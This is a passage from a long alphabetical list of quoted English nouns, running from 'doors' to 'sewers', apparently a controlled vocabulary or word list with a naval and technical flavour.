'doors', 'doorstep', 'doorsteps', 'dope', 'dopes', 'dose', 'doses', 'dot', 'dots', 'doubt', 'downgrade', 'downgrades', 'dozen', 'dozens', 'draft', 'drafts', 'drag', 'drags', 'drain', 'drainage', 'drainer', 'drainers', 'drains', 'drawer', 'drawers', 'drawings', 'dress', 'dresses', 'drift', 'drifts', 'drill', 'driller', 'drillers', 'drills', 'drink', 'drinks', 'drip', 'drips', 'drive', 'driver', 'drivers', 'drives', 'drop', 'drops', 'drug', 'drugs', 'drum', 'drums', 'drunkeness', 'drunks', 'drydock', 'drydocks', 'dump', 'duplicate', 'duplicates', 'durability', 'duration', 'duress', 'dust', 'dusts', 'duties', 'duty', 'dwell', 'dye', 'dyes', 'dynamics', 'dynamometer', 'dynamometers', 'ear', 'ears', 'earth', 'ease', 'eases', 'east', 'echelon', 'echelons', 'echo', 'echoes', 'economies', 'economy', 'eddies', 'eddy', 'edge', 'edges', 'editor', 'editors', 'education', 'educator', 'educators', 'effect', 'effectiveness', 'effects', 'efficiencies', 'efficiency', 'effort', 'efforts', 'egg', 'eggs', 'eighths', 'eighties', 'eights', 'ejection', 'elapse', 'elapses', 'elbow', 'elbows', 'election', 'elections', 'electrician', 'electricians', 'electricity', 'electrode', 'electrodes', 'electrolyte', 'electrolytes', 'electron', 'electronics', 'electrons', 'element', 'elements', 'elevation', 'eleven', 'eligibility', 'elimination', 'eliminator', 'eliminators', 'embosses', 'emergencies', 'emergency', 'emitter', 'emitters', 'employee', 'employees', 'enclosure', 'enclosures', 'encounter', 'encounters', 'end', 'endeavor', 'endeavors', 'endings', 'ends', 'enemies', 'enemy', 'energies', 'energizer', 'energizers', 'energy', 'engine', 'engineer', 'engineers', 'engines', 'enlistment', 'enlistments', 'ensign', 'ensigns', 'entrance', 'entrances', 'entrapment', 'entrapments', 'entries', 'entry', 'envelope', 'envelopes', 'environment', 'environments', 'equation', 'equations', 'equator', 'equipment', 'equivalent', 'equivalents', 'eraser', 'erasers', 'error', 'errors', 'escape', 'escapes', 'escort', 'escorts', 'establishment', 'establishments', 'evacuation', 'evacuations', 'evaluation', 'evaluations', 'evaporation', 'eve', 'evening', 'evenings', 'event', 'events', 'eves', 'evidence', 'examination', 'examinations', 'example', 'examples', 'exception', 'exceptions', 'excess', 'excesses', 'exchange', 'exchanger', 'exchangers', 'exchanges', 'excuse', 'excuses', 'execution', 'executions', 'executive', 'executives', 'exercise', 'exercises', 'exhaust', 'exhausts', 'exhibit', 'exhibits', 'existence', 'exit', 'exits', 'expansion', 'expansions', 'expenditure', 'expenditures', 'expense', 'expenses', 'experience', 'experiences', 'expert', 'experts', 'expiration', 'explanation', 'explanations', 'explosion', 'explosions', 'explosives', 'exposure', 'exposures', 'extension', 'extensions', 'extent', 'extenuation', 'extenuations', 'exterior', 'exteriors', 'extras', 'eye', 'eyes', 'fabrication', 'fabrications', 'face', 'facepiece', 'facepieces', 'faces', 'facilitation', 'facilities', 'facility', 'fact', 'factor', 'factories', 'factors', 'factory', 'facts', 'failure', 'failures', 'fake', 'fakes', 'fall', 'fallout', 'falls', 'families', 'family', 'fan', 'fans', 'fantail', 'fantails', 'farad', 'farads', 'fare', 'fares', 'farm', 'farms', 'fashion', 'fashions', 'fastener', 'fasteners', 'father', 'fathers', 'fathom', 'fathoms', 'fatigue', 'fatigues', 'fats', 'fault', 'faults', 'fear', 'fears', 'feather', 'feathers', 'feature', 'features', 'february', 'fee', 'feed', 'feedback', 'feeder', 'feeders', 'feeds', 'feelings', 'fees', 'feet', 'fellow', 'fellows', 'fence', 'fences', 'fetch', 'fetches', 'fiber', 'fibers', 'fiction', 'field', 'fields', 'fifteen', 'fifths', 'fifties', 'fifty', 'fight', 'fighter', 'fighters', 'fighting', 'fights', 'figure', 'figures', 'file', 'files', 'filler', 'fillers', 'film', 'films', 'filter', 'filters', 'fines', 'finger', 'fingers', 'finish', 'finishes', 'fire', 'firearm', 'firearms', 'fireball', 'fireballs', 'firefighting', 'fireplug', 'fireplugs', 'firer', 'firers', 'fires', 'firings', 'firmware', 'fish', 'fishes', 'fist', 'fists', 'fits', 'fittings', 'fives', 'fixture', 'flag', 'flags', 'flake', 'flakes', 'flame', 'flames', 'flange', 'flanges', 'flap', 'flaps', 'flare', 'flares', 'flash', 'flashes', 'flashlight', 'flashlights', 'fleet', 'fleets', 'flesh', 'flicker', 'flickers', 'flight', 'flights', 'float', 'floats', 'flood', 'floods', 'floor', 'floors', 'flow', 'flowchart', 'flower', 'flowers', 'fluid', 'fluids', 'flush', 'foam', 'focus', 'focuses', 'fog', 'fogs', 'fold', 'folder', 'folders', 'folds', 'food', 'foods', 'foot', 'footing', 'footings', 'force', 'forces', 'forearm', 'forearms', 'forecastle', 'forecastles', 'forecasts', 'foreground', 'forehead', 'foreheads', 'forest', 'forests', 'fork', 'forks', 'form', 'format', 'formation', 'formations', 'formats', 'forms', 'formula', 'formulas', 'fort', 'forties', 'forts', 'forty', 'fountain', 'fountains', 'fours', 'fourths', 'fraction', 'fractions', 'fracture', 'fractures', 'frame', 'frames', 'freedom', 'freeze', 'freezes', 'freight', 'freights', 'frequencies', 'frequency', 'freshwater', 'friction', 'friday', 'fridays', 'friend', 'friends', 'frigate', 'frigates', 'front', 'fronts', 'frost', 'frosts', 'fruit', 'fruits', 'fuel', 'fuels', 'fumes', 'function', 'functions', 'fund', 'funding', 'funds', 'fur', 'furnace', 'furnaces', 'furs', 'fuse', 'fuses', 'future', 'futures', 'gage', 'gages', 'galley', 'galleys', 'gallon', 'gallons', 'gallows', 'game', 'games', 'gang', 'gangs', 'gangway', 'gangways', 'gap', 'gaps', 'garage', 'garages', 'garden', 'gardens', 'gas', 'gases', 'gasket', 'gaskets', 'gasoline', 'gasolines', 'gate', 'gates', 'gear', 'gears', 'generals', 'generation', 'generations', 'generator', 'generators', 'geography', 'giant', 'giants', 'girl', 'girls', 'glance', 'glances', 'gland', 'glands', 'glass', 'glasses', 'glaze', 'glazes', 'gleam', 'gleams', 'glide', 'glides', 'glossaries', 'glossary', 'glove', 'gloves', 'glow', 'glows', 'glue', 'glues', 'goal', 'goals', 'goggles', 'gold', 'goods', 'government', 'governments', 'governor', 'governors', 'grade', 'grades', 'grain', 'grains', 'gram', 'grams', 'grant', 'grants', 'graph', 'graphs', 'grasp', 'grasps', 'grass', 'grasses', 'gravel', 'gravity', 'grease', 'greases', 'greenwich', 'grid', 'grids', 'grinder', 'grinders', 'grip', 'grips', 'groan', 'groans', 'groceries', 'groom', 'grooms', 'groove', 'grooves', 'gross', 'grounds', 'group', 'groups', 'grove', 'groves', 'growth', 'growths', 'guard', 'guards', 'guess', 'guesses', 'guest', 'guests', 'guidance', 'guide', 'guideline', 'guidelines', 'guides', 'guilt', 'gulf', 'gulfs', 'gum', 'gums', 'gun', 'gunfire', 'gunnery', 'gunpowder', 'guns', 'guy', 'guys', 'gyro', 'gyros', 'gyroscope', 'gyroscopes', 'habit', 'habits', 'hail', 'hair', 'hairpin', 'hairpins', 'hairs', 'half', 'hall', 'halls', 'halt', 'halts', 'halves', 'halyard', 'halyards', 'hammer', 'hammers', 'hand', 'handful', 'handfuls', 'handle', 'handler', 'handlers', 'handles', 'hands', 'handwriting', 'hangar', 'hangars', 'harbor', 'harbors', 'hardcopies', 'hardcopy', 'hardness', 'hardship', 'hardships', 'hardware', 'harm', 'harmonies', 'harmony', 'harness', 'harnesses', 'harpoon', 'harpoons', 'hashmark', 'hashmarks', 'haste', 'hat', 'hatch', 'hatches', 'hatchet', 'hatchets', 'hate', 'hats', 'haul', 'hauls', 'hazard', 'hazards', 'head', 'header', 'headers', 'headings', 'headquarters', 'heads', 'headset', 'headsets', 'health', 'heap', 'heaps', 'heart', 'hearts', 'heat', 'heater', 'heaters', 'heats', 'heel', 'heels', 'height', 'heights', 'helicopter', 'helicopters', 'hello', 'helm', 'helmet', 'helmets', 'helms', 'helmsman', 'helmsmen', 'help', 'hem', 'hems', 'henry', 'henrys', 'here', 'hertz', 'hickories', 'hickory', 'hierarchies', 'hierarchy', 'highline', 'highlines', 'highway', 'highways', 'hill', 'hills', 'hillside', 'hillsides', 'hilltop', 'hilltops', 'hinge', 'hinges', 'hint', 'hints', 'hip', 'hips', 'hiss', 'hisses', 'histories', 'history', 'hitch', 'hitches', 'hits', 'hoist', 'hoists', 'hold', 'holddown', 'holddowns', 'holder', 'holders', 'holds', 'hole', 'holes', 'home', 'homes', 'honk', 'honks', 'honor', 'honors', 'hood', 'hoods', 'hoof', 'hoofs', 'hook', 'hooks', 'hoop', 'hoops', 'hope', 'hopes', 'horizon', 'horizons', 'horn', 'horns', 'horsepower', 'hose', 'hoses', 'hospital', 'hospitals', 'hotel', 'hotels', 'hour', 'hours', 'house', 'housefall', 'housefalls', 'houses', 'housing', 'housings', 'howl', 'howls', 'hub', 'hubs', 'hug', 'hugs', 'hull', 'hulls', 'hum', 'human', 'humans', 'humidity', 'humor', 'hump', 'humps', 'hums', 'hundred', 'hundreds', 'hunk', 'hunks', 'hunt', 'hunts', 'hush', 'hushes', 'hut', 'huts', 'hydraulics', 'hydrometer', 'hydrometers', 'hygiene', 'hyphen', 'hyphens', 'ice', 'ices', 'icing', 'idea', 'ideal', 'ideals', 'ideas', 'identification', 'ignition', 'ignitions', 'illustration', 'illustrations', 'image', 'images', 'impact', 'impedance', 'implantation', 'implantations', 'implement', 'implementation', 'implementations', 'implements', 'importance', 'improvement', 'improvements', 'impulse', 'impulses', 'incentive', 'incentives', 'inception', 'inceptions', 'inch', 'inches', 'inclination', 'inclinations', 'incline', 'inclines', 'income', 'incomes', 'increase', 'increases', 'increment', 'increments', 'independence', 'index', 'indexes', 'indicate', 'indication', 'indications', 'indicator', 'indicators', 'individuals', 'inductance', 'industries', 'industry', 'infection', 'infections', 'inference', 'inferences', 'influence', 'influences', 'information', 'ingredient', 'ingredients', 'initial', 'initials', 'initiator', 'initiators', 'injection', 'injections', 'injector', 'injectors', 'injuries', 'injury', 'ink', 'inlet', 'inlets', 'input', 'inquiries', 'inquiry', 'insanities', 'insanity', 'insertion', 'insertions', 'insignia', 'insignias', 'inspection', 'inspections', 'installation', 'installations', 'instance', 'instances', 'instruction', 'instructions', 'instructor', 'instructors', 'instrument', 'instrumentation', 'instruments', 'insulation', 'insurance', 'intake', 'intakes', 'integer', 'integers', 'integrity', 'intelligence', 'intelligences', 'intensities', 'intensity', 'intent', 'intents', 'interaction', 'interactions', 'interchange', 'interchanges', 'intercom', 'intercoms', 'interest', 'interests', 'interface', 'interfaces', 'interference', 'interior', 'interiors', 'interpreter', 'interpreters', 'interrelation', 'interruption', 'interruptions', 'interval', 'intervals', 'interview', 'interviewer', 'interviewers', 'interviews', 'introduction', 'introductions', 'invention', 'inventions', 'inventories', 'inventory', 'investigation', 'investigations', 'investigator', 'investigators', 'investment', 'investments', 'invoice', 'invoices', 'iron', 'irons', 'island', 'islands', 'isolation', 'issue', 'issues', 'item', 'items', 'itineraries', 'itinerary', 'ivory', 'jack', 'jackbox', 'jackboxes', 'jacket', 'jackets', 'jacks', 'jail', 'jails', 'jam', 'jams', 'january', 'jar', 'jars', 'jaw', 'jaws', 'jellies', 'jelly', 'jeopardies', 'jeopardy', 'jets', 'jewel', 'jewels', 'jig', 'jigs', 'job', 'jobs', 'joint', 'joints', 'journal', 'journals', 'journey', 'journeys', 'judge', 'judges', 'judgment', 'jug', 'jugs', 'july', 'jump', 'jumper', 'jumpers', 'jumps', 'junction', 'junctions', 'june', 'junk', 'juries', 'jurisdiction', 'jurisdictions', 'jury', 'justice', 'keel', 'keels', 'kettle', 'kettles', 'key', 'keyboard', 'keyboards', 'keys', 'keyword', 'keywords', 'kick', 'kicks', 'kill', 'kills', 'kilogram', 'kilograms', 'kiloliter', 'kiloliters', 'kilometer', 'kilometers', 'kinds', 'kiss', 'kisses', 'kit', 'kite', 'kites', 'kits', 'knee', 'knees', 'knife', 'knives', 'knob', 'knobs', 'knock', 'knocks', 'knot', 'knots', 'knowledge', 'label', 'labels', 'labor', 'laboratories', 'laboratory', 'labors', 'lace', 'laces', 'lack', 'ladder', 'ladders', 'lake', 'lakes', 'lamp', 'lamps', 'land', 'landings', 'lands', 'lane', 'lanes', 'language', 'languages', 'lantern', 'lanterns', 'lap', 'laps', 'lapse', 'lapses', 'lard', 'laser', 'lasers', 'lash', 'lashes', 'latch', 'latches', 'latitude', 'latitudes', 'laugh', 'laughs', 'launch', 'launcher', 'launchers', 'launches', 'laundries', 'laundry', 'law', 'laws', 'layer', 'layers', 'lead', 'leader', 'leaders', 'leadership', 'leads', 'leaf', 'leak', 'leakage', 'leakages', 'leaks', 'leap', 'leaper', 'leapers', 'leaps', 'learning', 'leather', 'leathers', 'leave', 'leaves', 'leaving', 'lee', 'lees', 'leg', 'legend', 'legends', 'legging', 'leggings', 'legislation', 'legs', 'lender', 'lenders', 'length', 'lengths', 'lens', 'lenses', 'lesson', 'lessons', 'letter', 'letterhead', 'letterheads', 'lettering', 'letters', 'levels', 'lever', 'levers', 'liberties', 'liberty', 'libraries', 'library', 'license', 'licenses', 'lick', 'licks', 'lid', 'lids', 'lieutenant', 'lieutenants', 'life', 'lifeboat', 'lifeboats', 'lifetime', 'lifetimes', 'lift', 'lifts', 'light', 'lighter', 'lighters', 'lightning', 'lights', 'limb', 'limbs', 'lime', 'limes', 'limit', 'limitation', 'limitations', 'limits', 'limp', 'limps', 'line', 'linen', 'linens', 'lines', 'lining', 'link', 'linkage', 'linkages', 'links', 'lint', 'lints', 'lip', 'lips', 'liquor', 'liquors', 'list', 'listing', 'listings', 'lists', 'liter', 'liters', 'litre', 'litres', 'liver', 'livers', 'lives', 'load', 'loads', 'loaf', 'loan', 'loans', 'loaves', 'location', 'locations', 'lock', 'locker', 'lockers', 'locks', 'locomotive', 'locomotives', 'log', 'logic', 'logistics', 'logs', 'longitude', 'longitudes', 'look', 'lookout', 'lookouts', 'looks', 'loop', 'loops', 'loran', 'loss', 'losses', 'lot', 'lots', 'loudspeaker', 'loudspeakers', 'love', 'lubricant', 'lubricants', 'lubrication', 'lumber', 'lump', 'lumps', 'lung', 'lungs', 'machine', 'machinery', 'machines', 'macro', 'macros', 'magazine', 'magazines', 'magnesium', 'magnet', 'magneto', 'magnetos', 'magnets', 'magnitude', 'mail', 'mailbox', 'mailboxes', 'maintainability', 'maintenance', 'major', 'majorities', 'majority', 'majors', 'make', 'makes', 'makeup', 'male', 'males', 'malfunction', 'malfunctions', 'man', 'management', 'managements', 'manager', 'managers', 'maneuver', 'maneuvers', 'manifest', 'manifests', 'manner', 'manners', 'manpower', 'manual', 'manuals', 'manufacturer', 'manufacturers', 'map', 'maples', 'maps', 'marble', 'marbles', 'march', 'marches', 'margin', 'margins', 'marines', 'mark', 'market', 'markets', 'marks', 'mask', 'masks', 'mass', 'massed', 'masses', 'mast', 'master', 'masters', 'masts', 'mat', 'match', 'matches', 'mate', 'material', 'materials', 'mates', 'math', 'mathematics', 'mats', 'matter', 'matters', 'mattress', 'mattresses', 'maximum', 'maximums', 'meal', 'meals', 'meanings', 'means', 'measure', 'measurement', 'measurements', 'measures', 'meat', 'meats', 'mechanic', 'mechanics', 'mechanism', 'mechanisms', 'medal', 'medals', 'medicine', 'medicines', 'medium', 'mediums', 'meet', 'meeting', 'meetings', 'meets', 'member', 'members', 'membrane', 'membranes', 'memorandum', 'memorandums', 'memories', 'memory', 'men', 'mention', 'mentions', 'menu', 'menus', 'merchandise', 'merchant', 'merchants', 'mercury', 'meridian', 'meridians', 'mess', 'message', 'messages', 'messenger', 'messengers', 'messes', 'metal', 'metals', 'meter', 'meters', 'method', 'methodology', 'methods', 'metrics', 'microphone', 'microphones', 'midnight', 'midwatch', 'midwatches', 'mile', 'miles', 'milestone', 'milestones', 'military', 'milk', 'milks', 'mill', 'milligram', 'milligrams', 'milliliter', 'milliliters', 'millimeter', 'millimeters', 'million', 'millions', 'mills', 'mind', 'minds', 'mine', 'miner', 'mineral', 'minerals', 'miners', 'mines', 'minimum', 'minimums', 'minority', 'mint', 'mints', 'minuses', 'minute', 'minutes', 'mirror', 'mirrors', 'misalignment', 'misalignments', 'misalinement', 'misalinements', 'misconduct', 'misfit', 'misfits', 'misleads', 'miss', 'misses', 'missile', 'missiles', 'mission', 'missions', 'mist', 'mistake', 'mistakes', 'mistrial', 'mistrials', 'mists', 'mitt', 'mitten', 'mittens', 'mitts', 'mix', 'mixes', 'mixture', 'mixtures', 'mode', 'model', 'models', 'modem', 'modes', 'modification', 'modifications', 'module', 'modules', 'moisture', 'moistures', 'molecule', 'molecules', 'moment', 'moments', 'monday', 'mondays', 'money', 'moneys', 'monitor', 'monitors', 'monolith', 'monoliths', 'month', 'months', 'moon', 'moonlight', 'moons', 'mop', 'mops', 'morale', 'morals', 'morning', 'mornings', 'morphine', 'moss', 'mosses', 'motel', 'motels', 'mother', 'mothers', 'motion', 'motions', 'motor', 'motors', 'mount', 'mountain', 'mountains', 'mounts', 'mouth', 'mouths', 'move', 'movement', 'movements', 'mover', 'movers', 'moves', 'much', 'mud', 'mug', 'mugs', 'mule', 'mules', 'multimeter', 'multimeters', 'multiplex', 'multiplication', 'multiplications', 'multisystem', 'multisystems', 'multitask', 'multitasks', 'muscle', 'muscles', 'music', 'mustard', 'nail', 'nails', 'name', 'nameplate', 'nameplates', 'names', 'narcotics', 'nation', 'nations', 'nature', 'nausea', 'navies', 'navigation', 'navigations', 'navigator', 'navigators', 'navy', 'neck', 'necks', 'need', 'needle', 'needles', 'needs', 'neglect', 'negligence', 'nerve', 'nerves', 'nest', 'nests', 'net', 'nets', 'network', 'networks', 'neutron', 'neutrons', 'news', 'nickel', 'nickels', 'night', 'nights', 'nines', 'nineties', 'nod', 'nods', 'noise', 'noises', 'nomenclature', 'nomenclatures', 'nonavailabilities', 'noon', 'north', 'nose', 'noses', 'notation', 'note', 'notes', 'notice', 'notices', 'noun', 'nouns', 'november', 'nozzle', 'nozzles', 'null', 'nulls', 'number', 'numbers', 'numeral', 'numerals', 'nurse', 'nurses', 'nut', 'nuts', 'nylon', 'nylons', 'oak', 'oaks', 'oar', 'oars', 'object', 'objective', 'objectives', 'objects', 'obligation', 'obligations', 'observation', 'observations', 'observer', 'observers', 'occasion', 'occasions', 'occurrence', 'occurrences', 'ocean', 'oceans', 'october', 'octobers', 'odds', 'odor', 'odors', 'offender', 'offenders', 'offense', 'offenses', 'offer', 'offering', 'offers', 'office', 'officer', 'officers', 'offices', 'official', 'officials', 'offsets', 'ohm', 'ohms', 'oil', 'oils', 'okays', 'ones', 'openings', 'operabilities', 'operability', 'operand', 'operands', 'operation', 'operations', 'operator', 'operators', 'opinion', 'opinions', 'opportunities', 'opportunity', 'opposites', 'option', 'options', 'orange', 'oranges', 'order', 'orders', 'ordnance', 'ore', 'ores', 'organ', 'organization', 'organizations', 'organs', 'orifice', 'orifices', 'origin', 'originals', 'originator', 'originators', 'origins', 'ornament', 'ornaments', 'oscillation', 'oscillations', 'oscillator', 'oscillators', 'others', 'ounce', 'ounces', 'outboards', 'outfit', 'outfits', 'outing', 'outlet', 'outlets', 'outline', 'outlines', 'output', 'oven', 'ovens', 'overalls', 'overcoat', 'overcoats', 'overcurrent', 'overcurrents', 'overflow', 'overlay', 'overlays', 'overload', 'overloads', 'overtime', 'overvoltage', 'overvoltages', 'owner', 'owners', 'oxide', 'oxides', 'oxygen', 'oxygens', 'pace', 'paces', 'pacific', 'pack', 'package', 'packages', 'packs', 'pad', 'pads', 'page', 'pages', 'pail', 'pails', 'pain', 'paint', 'painter', 'painters', 'painting', 'paintings', 'paints', 'pair', 'pairs', 'pan', 'pane', 'panel', 'paneling', 'panels', 'panes', 'pans', 'paper', 'papers', 'parachute', 'parachutes', 'paragraph', 'paragraphs', 'parallels', 'parameter', 'parameters', 'parcel', 'parcels', 'parentheses', 'parenthesis', 'parities', 'parity', 'park', 'parks', 'part', 'participation', 'participations', 'particle', 'particles', 'parties', 'partition', 'partitions', 'partner', 'partners', 'parts', 'party', 'pascal', 'pass', 'passage', 'passages', 'passbook', 'passbooks', 'passenger', 'passengers', 'passes', 'passivation', 'passivations', 'password', 'passwords', 'paste', 'pastes', 'pat', 'patch', 'patches', 'path', 'paths', 'patient', 'patients', 'patrol', 'patrols', 'pats', 'patter', 'pattern', 'patterns', 'pavement', 'paw', 'paws', 'pay', 'paygrade', 'paygrades', 'payment', 'payments', 'payroll', 'pea', 'peace', 'peacetime', 'peak', 'peaks', 'pear', 'pears', 'peas', 'peck', 'pecks', 'pedal', 'pedals', 'peg', 'pegs', 'pen', 'pencil', 'pencils', 'pennant', 'pennants', 'pens', 'people', 'percent', 'percentage', 'percentages', 'percents', 'perfect', 'perforation', 'perforations', 'perforator', 'perforators', 'performance', 'performances', 'period', 'periods', 'permission', 'permit', 'permits', 'person', 'personalities', 'personality', 'personnel', 'persons', 'petition', 'petitions', 'petroleum', 'phase', 'phases', 'photo', 'photodiode', 'photodiodes', 'photograph', 'photographs', 'photos', 'physics', 'pick', 'picks', 'picture', 'pictures', 'piece', 'pieces', 'pier', 'piers', 'pile', 'piles', 'pilot', 'pilots', 'pin', 'pine', 'pines', 'pink', 'pins', 'pint', 'pints', 'pipe', 'pipes', 'pistol', 'pistols', 'piston', 'pistons', 'pit', 'pitch', 'pitches', 'pits', 'place', 'places', 'plan', 'plane', 'planes', 'plans', 'plant', 'plants', 'plastic', 'plastics', 'plate', 'plates', 'platform', 'platforms', 'plating', 'platter', 'platters', 'play', 'plays', 'plead', 'pleads', 'pleasure', 'plexiglass', 'plot', 'plots', 'plow', 'plug', 'plugs', 'pocket', 'pockets', 'point', 'pointer', 'pointers', 'points', 'poison', 'poisons', 'poke', 'pokes', 'polarities', 'polarity', 'pole', 'poles', 'police', 'polices', 'policies', 'policy', 'polish', 'polisher', 'polishers', 'polishes', 'poll', 'polls', 'pond', 'ponds', 'pool', 'pools', 'pop', 'pops', 'population', 'port', 'porter', 'porters', 'portion', 'portions', 'ports', 'position', 'positions', 'possession', 'possessions', 'possibilities', 'possibility', 'post', 'posts', 'pot', 'potato', 'potatos', 'pots', 'pound', 'pounds', 'powder', 'powders', 'power', 'powers', 'practice', 'practices', 'precaution', 'precautions', 'precedence', 'precision', 'preference', 'preferences', 'prefix', 'prefixes', 'preliminaries', 'preparation', 'preparations', 'preposition', 'prepositions', 'prerequisite', 'presence', 'presences', 'present', 'presentation', 'presentations', 'presents', 'preservation', 'preserver', 'preservers', 'president', 'presidents', 'press', 'presses', 'pressure', 'pressures', 'presumption', 'presumptions', 'prevention', 'preventions', 'price', 'prices', 'prime', 'primes', 'primitives', 'principal', 'principals', 'principle', 'principles', 'print', 'printout', 'printouts', 'prints', 'priorities', 'priority', 'prism', 'prisms', 'prison', 'prisoner', 'prisoners', 'prisons', 'privates', 'privilege', 'privileges', 'probabilities', 'probability', 'probe', 'probes', 'problem', 'problems', 'procedure', 'procedures', 'process', 'processes', 'processor', 'processors', 'procurement', 'procurements', 'produce', 'product', 'products', 'profession', 'professionalism', 'professionals', 'professions', 'proficiencies', 'proficiency', 'profile', 'profiles', 'profit', 'profits', 'program', 'programmer', 'programmers', 'programs', 'progress', 'project', 'projectile', 'projectiles', 'projects', 'promotion', 'promotions', 'prompts', 'pronoun', 'pronouns', 'proof', 'proofs', 'prop', 'propeller', 'propellers', 'properties', 'property', 'proportion', 'proportions', 'propose', 'proposes', 'props', 'propulsion', 'propulsions', 'protection', 'protest', 'protests', 'provision', 'provisions', 'public', 'publication', 'publications', 'puddle', 'puddles', 'puff', 'puffs', 'pull', 'pulls', 'pulse', 'pulses', 'pump', 'pumps', 'punch', 'punches', 'puncture', 'punctures', 'punishment', 'punishments', 'pupil', 'pupils', 'purchase', 'purchaser', 'purchasers', 'purchases', 'purge', 'purges', 'purpose', 'purposes', 'push', 'pushdown', 'pushdowns', 'pushes', 'pushup', 'pushups', 'pyramid', 'pyramids', 'qualification', 'qualifications', 'qualifier', 'qualifiers', 'qualities', 'quality', 'quantities', 'quantity', 'quart', 'quarter', 'quarterdeck', 'quarterdecks', 'quartermaster', 'quartermasters', 'quarters', 'quarts', 'question', 'questions', 'quiet', 'quiets', 'quota', 'quotas', 'race', 'races', 'rack', 'racks', 'radar', 'radars', 'radian', 'radians', 'radiation', 'radiator', 'radiators', 'radio', 'radios', 'radius', 'radiuses', 'rag', 'rags', 'rail', 'railroad', 'railroads', 'rails', 'railway', 'railways', 'rain', 'rainbow', 'rainbows', 'raincoat', 'raincoats', 'rains', 'raise', 'raises', 'rake', 'rakes', 'ram', 'ramp', 'ramps', 'rams', 'range', 'ranges', 'rank', 'ranks', 'rap', 'raps', 'rate', 'rates', 'ratings', 'ratio', 'ration', 'rations', 'ratios', 'rattle', 'rattles', 'ray', 'rays', 'reach', 'reaches', 'reactance', 'reaction', 'reactions', 'reactor', 'reactors', 'reader', 'readers', 'readiness', 'reading', 'readings', 'realignment', 'realignments', 'realinement', 'realinements', 'ream', 'reams', 'rear', 'reason', 'reasons', 'rebound', 'rebounds', 'recapitulation', 'recapitulations', 'receipt', 'receipts', 'receiver', 'receivers', 'receptacle', 'receptacles', 'recess', 'recesses', 'recipient', 'recipients', 'recognition', 'recognitions', 'recombination', 'recombinations', 'recommendation', 'recommendations', 'reconfiguration', 'reconfigurations', 'record', 'recording', 'recordkeeping', 'records', 'recoveries', 'recovery', 'recruit', 'recruiter', 'recruiters', 'recruits', 'reduction', 'reductions', 'reel', 'reels', 'reenlistment', 'reenlistments', 'reference', 'references', 'refrigerator', 'refrigerators', 'refund', 'refunds', 'refurbishment', 'refuse', 'region', 'regions', 'register', 'registers', 'regret', 'regrets', 'regulation', 'regulations', 'regulator', 'regulators', 'rehabilitation', 'reinforcement', 'reinforcements', 'rejection', 'rejections', 'relation', 'relations', 'relationship', 'relationships', 'relay', 'relays', 'release', 'releases', 'reliabilities', 'reliability', 'relief', 'religion', 'religions', 'relocation', 'relocations', 'reluctance', 'remainder', 'remainders', 'remains', 'remedies', 'remedy', 'removal', 'removals', 'repair', 'repairs', 'replacement', 'replacements', 'replenishment', 'replenishments', 'report', 'reports', 'representative', 'representatives', 'reproduction', 'reproductions', 'request', 'requests', 'requirement', 'requirements', 'requisition', 'requisitions', 'rescue', 'rescuer', 'rescuers', 'rescues', 'research', 'researcher', 'researchers', 'reserve', 'reserves', 'reservist', 'reservists', 'reservoir', 'reservoirs', 'resident', 'residents', 'residue', 'residues', 'resistance', 'resistances', 'resistor', 'resistors', 'resolution', 'resource', 'resources', 'respect', 'respects', 'respiration', 'respirations', 'response', 'responses', 'responsibilities', 'responsibility', 'rest', 'restaurant', 'restaurants', 'restraint', 'restraints', 'restriction', 'restrictions', 'result', 'results', 'retailer', 'retailers', 'retention', 'retirement', 'retractor', 'retractors', 'retrieval', 'retrievals', 'return', 'returns', 'reveille', 'reverse', 'review', 'reviews', 'revision', 'revisions', 'revolution', 'revolutions', 'reward', 'rewards', 'rheostat', 'rheostats', 'rhythm', 'rhythms', 'rib', 'ribbon', 'ribbons', 'ribs', 'rice', 'riddle', 'riddles', 'ride', 'rides', 'riding', 'rifle', 'rifles', 'rifling', 'rig', 'rights', 'rigs', 'rim', 'rims', 'ringing', 'rings', 'rinse', 'rinses', 'river', 'rivers', 'road', 'roads', 'roadside', 'roar', 'roars', 'rock', 'rocket', 'rockets', 'rocks', 'rod', 'rods', 'roll', 'roller', 'rollers', 'rollout', 'rollouts', 'rolls', 'roof', 'roofs', 'room', 'rooms', 'root', 'roots', 'rope', 'ropes', 'rose', 'rotation', 'rotations', 'rotor', 'rotors', 'round', 'rounds', 'route', 'routes', 'routine', 'routines', 'rowboat', 'rowboats', 'rower', 'rowers', 'rubber', 'rubbish', 'rudder', 'rudders', 'rug', 'rugs', 'rule', 'rules', 'rumble', 'rumbles', 'run', 'runaway', 'runaways', 'runner', 'runners', 'runoff', 'runoffs', 'runout', 'runouts', 'runs', 'runway', 'runways', 'rush', 'rushes', 'rust', 'sabotage', 'sack', 'sacks', 'saddle', 'saddles', 'safeguard', 'safeguards', 'safety', 'sail', 'sailor', 'sailors', 'sails', 'sale', 'sales', 'salt', 'salts', 'salute', 'salutes', 'salvage', 'salvages', 'sample', 'samples', 'sand', 'sanitation', 'sap', 'saps', 'sash', 'sashes', 'satellite', 'satellites', 'saturday', 'saturdays', 'saving', 'savings', 'saying', 'scab', 'scabs', 'scale', 'scales', 'scene', 'scenes', 'schedule', 'scheduler', 'schedulers', 'schedules', 'schematics', 'school', 'schoolhouse', 'schoolhouses', 'schoolroom', 'schoolrooms', 'schools', 'science', 'sciences', 'scissors', 'scope', 'scopes', 'score', 'scores', 'scrap', 'scraps', 'scratch', 'scratches', 'scratchpad', 'scratchpads', 'scream', 'screams', 'screen', 'screens', 'screw', 'screwdriver', 'screwdrivers', 'screws', 'sea', 'seal', 'seals', 'seam', 'seaman', 'seamanship', 'seamen', 'seams', 'search', 'searches', 'searchlight', 'searchlights', 'seas', 'season', 'seasoning', 'seasons', 'seat', 'seats', 'seawater', 'second', 'seconds', 'secret', 'secretaries', 'secretary', 'secrets', 'section', 'sections', 'sector', 'sectors', 'securities', 'security', 'sediment', 'sediments', 'seed', 'seeds', 'seesaw', 'seesaws', 'segment', 'segments', 'selection', 'selections', 'selector', 'selectors', 'self', 'selves', 'semaphore', 'semaphores', 'semicolon', 'semicolons', 'semiconductor', 'semiconductors', 'sense', 'senses', 'sentence', 'sentences', 'sentries', 'sentry', 'separation', 'separations', 'september', 'sequence', 'sequences', 'serial', 'serials', 'series', 'servant', 'servants', 'service', 'services', 'servo', 'servos', 'session', 'sessions', 'sets', 'setting', 'settings', 'settlement', 'settlements', 'setup', 'setups', 'sevens', 'sevenths', 'seventies', 'sewage', 'sewer', 'sewers', 